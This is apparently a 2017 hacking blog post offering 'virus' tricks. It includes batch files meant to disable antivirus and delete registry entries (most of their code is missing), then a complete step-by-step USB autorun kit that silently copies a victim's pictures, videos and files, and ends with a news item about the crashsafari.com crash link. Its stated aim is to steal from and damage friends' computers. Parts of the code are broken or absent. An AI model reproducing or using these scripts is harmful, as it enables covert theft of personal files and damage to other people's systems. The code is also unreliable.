Sunday, 16 April 2017

DANGEROUS VIRUS THAT CAN DAMAGE ANY COMPTER



> Disable Victim Antivirus
by sebding this virus


Open Notepad Copy text from given box and Paste To Notepad










Now Save this code as .bat and send to victim 😀

>Registry Deleter:-







:MESSAGE

ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE

Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim’s computer.

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)







Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.


STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines



@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls



Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.


STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs


This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4


Open Notepad one last time and copy-paste the following line.



wscript.exe \invisible.vbs file.bat



Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.












These Four Lines Of Code (VIRUS) Can Crash Anyone’s Smartphone And Computer

There’s a notorious link being shared on social networking websites that can crash nearly all smartphones — all you have to do is just click on this link. Known as , crashsafari.com (clicking on this will crash your browser), this link crashes your browser by overloading it with thousands of characters in the address bar each second. As a result, the phone memory exhausts and your device crashes.

Back in September, we encountered a similar bug in Google Chrome that caused the browser to crash with just 16 characters. This website link is being spread via apps, social networks, simple URLs, and shortened URLs. It should be noted that this bug isn’t malicious and it doesn’t break anything in your phone.

Devices affected by crashsafari.com;






The bug hits iPhone’s Safari browser in the worst manner possible. If you click on the link, it crashes your iPhone 6S or iPhone 5S running iOS version 9.2.1 or a regular iPhone 6 running iOS 9.2. After about 20 seconds, it’ll force the iPhone to reboot and heat up the device.

Even though the new bug is called crashsafari, it affects Android phones and Google Chrome as well. Apart from phones, this bug also affects desktop browsers if your computer doesn’t have enough RAM and CPU power.

How does crashsafari.com work?

crashsafari iphone bug



The website is running a small piece of JavaScript that creates a loop with the help of History API and crashes your device. The History API allows the websites to change the URL of the page without performing page refresh.

If you are an iPhone user, you should be very careful about any new incoming shortened links as they could forcibly reboot your phones. Notably, these links have already been opened 100,000 times. You are advised to take extra care as it’s being spread on the web via misleading links.

Featured post

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...